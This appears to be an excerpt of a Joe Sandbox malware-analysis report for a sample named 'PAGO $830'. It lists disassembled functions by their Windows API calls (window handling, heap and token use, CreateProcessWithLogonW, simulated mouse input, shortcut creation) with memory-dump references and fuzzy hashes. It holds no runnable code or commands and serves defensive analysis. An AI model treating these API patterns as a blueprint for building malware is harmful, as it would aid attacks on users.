                                                          APIs
                                                          • VariantInit.OLEAUT32(00000035), ref: 00DCF6A2
                                                          • SysAllocString.OLEAUT32(?), ref: 00DCF749
                                                          • VariantCopy.OLEAUT32(00DCF94D,00000000), ref: 00DCF772
                                                          • VariantClear.OLEAUT32(00DCF94D), ref: 00DCF796
                                                          • VariantCopy.OLEAUT32(00DCF94D,00000000), ref: 00DCF79A
                                                          • VariantClear.OLEAUT32(?), ref: 00DCF7A4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                          • String ID:
                                                          • API String ID: 3859894641-0
                                                          • Opcode ID: 9aa4ede13196e00ebc2348c42ad2c50bcfe20240e95560151da4c2f99c62b0df
                                                          • Instruction ID: 6a1623ccdfe18b997d53125348912f2ea68607f3b2370705407864872ec0259a
                                                          • Opcode Fuzzy Hash: 9aa4ede13196e00ebc2348c42ad2c50bcfe20240e95560151da4c2f99c62b0df
                                                          • Instruction Fuzzy Hash: C051C771600312AACF246F649895FA9B3A6EF49710B24997FF905EF2A1DB708840CB75
                                                          Function 00DE902A Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D78FA0: _wcslen.LIBCMT ref: 00D78FA5
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00DE9403
                                                          • _wcslen.LIBCMT ref: 00DE9424
                                                          • _wcslen.LIBCMT ref: 00DE944B
                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00DE94A3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$FileName$OpenSave
                                                          • String ID: X
                                                          • API String ID: 83654149-3081909835
                                                          • Opcode ID: 171c89c7fdc2bf6988c7ce2a89f94726d5947ca35716e429c975656c093167c5
                                                          • Instruction ID: 63ce4166396223a2db7ddfb8d1837877a8fcdcebd6719036b364dd3108f36fe9
                                                          • Opcode Fuzzy Hash: 171c89c7fdc2bf6988c7ce2a89f94726d5947ca35716e429c975656c093167c5
                                                          • Instruction Fuzzy Hash: FAE1A0315053409FCB24EF25C895A6AB7E0FF85314F04896DF9899B292EB71DD05CBB2
                                                          Function 00D8A692 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • BeginPaint.USER32(?,?,?), ref: 00D8A6C7
                                                          • GetWindowRect.USER32(?,?), ref: 00D8A72B
                                                          • ScreenToClient.USER32(?,?), ref: 00D8A748
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D8A759
                                                          • EndPaint.USER32(?,?,?,?,?), ref: 00D8A7A7
                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00DC7BA7
                                                            • Part of subcall function 00D8A7BF: BeginPath.GDI32(00000000), ref: 00D8A7DD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                          • String ID:
                                                          • API String ID: 3050599898-0
                                                          • Opcode ID: f15a0cd052ca71df9b7347f642697c68bc4e553da9cc0c4708a52b0e9ac29d26
                                                          • Instruction ID: 3aef222e49a5a20f647a4b2ca6fd51257f8cfb120fa8fbedf6a6073c2c92c79b
                                                          • Opcode Fuzzy Hash: f15a0cd052ca71df9b7347f642697c68bc4e553da9cc0c4708a52b0e9ac29d26
                                                          • Instruction Fuzzy Hash: F241C230104301AFD710EF29DC84FBA7BB9EF85320F18066AFA94971A1C7719889DB72
                                                          Function 00DE070D Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DE072A
                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00DE0765
                                                          • EnterCriticalSection.KERNEL32(?), ref: 00DE0781
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00DE07FA
                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00DE0811
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DE083F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                          • String ID:
                                                          • API String ID: 3368777196-0
                                                          • Opcode ID: 41c8c228155f8c66c1417e9645bb8a0f70f1f5dbf5d8cc8c4a2309423d635285
                                                          • Instruction ID: 3ffa323293c33dc7d4a8862e6fb2fba43841ebca34096447e0b078e1402430e8
                                                          • Opcode Fuzzy Hash: 41c8c228155f8c66c1417e9645bb8a0f70f1f5dbf5d8cc8c4a2309423d635285
                                                          • Instruction Fuzzy Hash: FE417071900205EFDF04AF55DC85AAA7BB8FF44310F1485B5ED00AA296D770EE95DBB0
                                                          Function 00E080CD Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,00DC767D), ref: 00E0813E
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00E08164
                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,00DC767D), ref: 00E081C3
                                                          • ShowWindow.USER32(00000000,00000004,?,?,?,?,00DC767D), ref: 00E081D7
                                                          • EnableWindow.USER32(00000000,00000001), ref: 00E081FD
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E08221
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 7196173372b45380fccd48782d48600b73a1eebb53ba3b2f6c2bb091e8d079f5
                                                          • Instruction ID: b7d039eed459f24e6ce6feb57688311aafad55ea9a3e31930fe0dac356f9f54e
                                                          • Opcode Fuzzy Hash: 7196173372b45380fccd48782d48600b73a1eebb53ba3b2f6c2bb091e8d079f5
                                                          • Instruction Fuzzy Hash: 0E418234602240AFDB21CF14D999BA17BE0AF4A718F1851A9E5986B2F3CB7258D6CF41
                                                          Function 00DF2201 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 00DF220F
                                                            • Part of subcall function 00DEE40C: GetWindowRect.USER32(?,?), ref: 00DEE424
                                                          • GetDesktopWindow.USER32 ref: 00DF2239
                                                          • GetWindowRect.USER32(00000000), ref: 00DF2240
                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DF227C
                                                          • GetCursorPos.USER32(?), ref: 00DF22A8
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DF2306
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                          • String ID:
                                                          • API String ID: 2387181109-0
                                                          • Opcode ID: 6c9a78a3558a1e96c21c1cb544882320a71216ac54cc0b1f8dcdd5a2a58f066c
                                                          • Instruction ID: 57bbb19b5ea4c2d878402c38dc0b6b8c9163b0ebac9a5a35b194709d1f265890
                                                          • Opcode Fuzzy Hash: 6c9a78a3558a1e96c21c1cb544882320a71216ac54cc0b1f8dcdd5a2a58f066c
                                                          • Instruction Fuzzy Hash: E431E572505319AFC720DF15DC49F6BBBA9FF84314F000A19F585A7191C731EA48CBA6
                                                          Function 00DD4BD3 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00DD4BEB
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DD4C08
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DD4C40
                                                          • _wcslen.LIBCMT ref: 00DD4C5E
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DD4C66
                                                          • _wcsstr.LIBVCRUNTIME ref: 00DD4C70
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                          • String ID:
                                                          • API String ID: 72514467-0
                                                          • Opcode ID: 28947029d1a2461ddfd5a033eb6f3858bb25236e09738bd5c0404fd230226089
                                                          • Instruction ID: 12729a11020d42fd3581694193e72931574524a00b37e04e58f16a2f5fdd85d3
                                                          • Opcode Fuzzy Hash: 28947029d1a2461ddfd5a033eb6f3858bb25236e09738bd5c0404fd230226089
                                                          • Instruction Fuzzy Hash: 212104322142407BEB256B69AC09E7B7BACDF45710F14802AF809DA292EE72DC4197B1
                                                          Function 00DE573C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D7592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D75922,?,?,00D748AA,?,?,?,00000000), ref: 00D7594D
                                                          • _wcslen.LIBCMT ref: 00DE5799
                                                          • CoInitialize.OLE32(00000000), ref: 00DE58B3
                                                          • CoCreateInstance.OLE32(00E0FD14,00000000,00000001,00E0FB84,?), ref: 00DE58CC
                                                          • CoUninitialize.OLE32 ref: 00DE58EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                          • String ID: .lnk
                                                          • API String ID: 3172280962-24824748
                                                          • Opcode ID: 9b40e0fed09ff582d8b15f24a1884474f3147387128e6718419e0349780d8e8a
                                                          • Instruction ID: b25334bd7f9f2f240f95380658f2852722b7eaff93be4fbf59e8aa07ecf855c0
                                                          • Opcode Fuzzy Hash: 9b40e0fed09ff582d8b15f24a1884474f3147387128e6718419e0349780d8e8a
                                                          • Instruction Fuzzy Hash: C6D186746047019FC714EF26C484A2ABBE1FF89758F14895DF88A9B361DB31EC45CBA2
                                                          Function 00E07B91 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E07BD5
                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E07BFA
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E07C12
                                                          • GetSystemMetrics.USER32(00000004), ref: 00E07C3B
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00DEB6CB,00000000), ref: 00E07C5B
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • GetSystemMetrics.USER32(00000004), ref: 00E07C46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: b579cdda7b106cb84f8ad5fdc32fe20e901e4aa9b8c3a791fba03146d3245240
                                                          • Instruction ID: d5a36ea4ddc39a3b96f82dc7c2b01d047420fd4ce8980678aee3ded4a843b626
                                                          • Opcode Fuzzy Hash: b579cdda7b106cb84f8ad5fdc32fe20e901e4aa9b8c3a791fba03146d3245240
                                                          • Instruction Fuzzy Hash: 0E212D716182019FEF245F39CC84A6A37A4FB49329F241728F962F22E0D730B9C0CB10
                                                          Function 00DD16A1 Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DD0EF8: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DD0F0E
                                                            • Part of subcall function 00DD0EF8: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DD0F1A
                                                            • Part of subcall function 00DD0EF8: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DD0F29
                                                            • Part of subcall function 00DD0EF8: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DD0F30
                                                            • Part of subcall function 00DD0EF8: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DD0F46
                                                          • GetLengthSid.ADVAPI32(?,00000000,00DD1279), ref: 00DD16F2
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00DD16FE
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00DD1705
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00DD171E
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00DD1279), ref: 00DD1732
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD1739
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          • Opcode ID: 6b0c618052ab499b9204f7320286ee14f821732e5b385097b0f90c8a6eef7029
                                                          • Instruction ID: 60af8d5b1ae6475350998e0c09f681b2938ba2bb568875318bdbf3b05250244b
                                                          • Opcode Fuzzy Hash: 6b0c618052ab499b9204f7320286ee14f821732e5b385097b0f90c8a6eef7029
                                                          • Instruction Fuzzy Hash: 9111BE76601204FFDB109FA5CC49FAF7BB8FB45355F28821AE842A7220D7329985CB30
                                                          Function 00DD1412 Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DD1443
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00DD144A
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00DD1459
                                                          • CloseHandle.KERNEL32(00000004), ref: 00DD1464
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DD1493
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00DD14A7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: 758662f3b3218e049418248d26cd80359f61304d8339166e0b33499a25b488c1
                                                          • Instruction ID: 2fd3d5823a2fe7837cfc16cd7de099a3e81d5c9cfc7eb2325fd3db415e797807
                                                          • Opcode Fuzzy Hash: 758662f3b3218e049418248d26cd80359f61304d8339166e0b33499a25b488c1
                                                          • Instruction Fuzzy Hash: 1A112C7650120DBFDF118FA4ED49FDE7BA9EF08704F188155FA00A2160C3768DA5DB60
                                                          Function 00D93312 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00D93309,00D92F75), ref: 00D93320
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9332E
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D93347
                                                          • SetLastError.KERNEL32(00000000,?,00D93309,00D92F75), ref: 00D93399
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 309dafc30b3bb5990428cfd7f5ea691083eb9552ec4a8fbe2614a80b9e61ce88
                                                          • Instruction ID: 9863a19a32b30ec678154d021ce539aee5af8bfe0d431d49972684a8a069548d
                                                          • Opcode Fuzzy Hash: 309dafc30b3bb5990428cfd7f5ea691083eb9552ec4a8fbe2614a80b9e61ce88
                                                          • Instruction Fuzzy Hash: 9801DF33A5C315FEEF2827B67C8DA2A2A94EB06B79B340329F014A51E1EF128D055674
                                                          Function 00DA2D04 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00D94973,?,?,?,00D96502,?,?,?,?), ref: 00DA2D08
                                                          • _free.LIBCMT ref: 00DA2D3B
                                                          • _free.LIBCMT ref: 00DA2D63
                                                          • SetLastError.KERNEL32(00000000,?,?,?), ref: 00DA2D70
                                                          • SetLastError.KERNEL32(00000000,?,?,?), ref: 00DA2D7C
                                                          • _abort.LIBCMT ref: 00DA2D82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: c2e7a27023fd197bc9937efc166390ab436877f47c4f0abbe3a6616bb14e9631
                                                          • Instruction ID: 6f2fe07537a1156da49abdf99d9c1eaa1e5927f932f527f9e8d77c4ad644a336
                                                          • Opcode Fuzzy Hash: c2e7a27023fd197bc9937efc166390ab436877f47c4f0abbe3a6616bb14e9631
                                                          • Instruction Fuzzy Hash: 70F0CD315416016BCA21273FBC0AE3B2666EBC3760F354514F418B21D7EF69CD4742B1
                                                          Function 00E08916 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D8AB19
                                                            • Part of subcall function 00D8AABF: SelectObject.GDI32(?,00000000), ref: 00D8AB28
                                                            • Part of subcall function 00D8AABF: BeginPath.GDI32(?), ref: 00D8AB3F
                                                            • Part of subcall function 00D8AABF: SelectObject.GDI32(?,00000000), ref: 00D8AB68
                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E08940
                                                          • LineTo.GDI32(?,00000003,00000000), ref: 00E08954
                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E08962
                                                          • LineTo.GDI32(?,00000000,00000003), ref: 00E08972
                                                          • EndPath.GDI32(?), ref: 00E08982
                                                          • StrokePath.GDI32(?), ref: 00E08992
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                          • String ID:
                                                          • API String ID: 43455801-0
                                                          • Opcode ID: f528b506d35a259856282c2414fa9d8882af217534dc7f8004643de65e9450d1
                                                          • Instruction ID: 8b8a41c8933bf72436619080aa03661473b7fae662f232d7e307c79a75963055
                                                          • Opcode Fuzzy Hash: f528b506d35a259856282c2414fa9d8882af217534dc7f8004643de65e9450d1
                                                          • Instruction Fuzzy Hash: D711217604010CFFEF019F95DC88EAA7F6DEF08354F148151FA49A51A1C7729D99DBA0
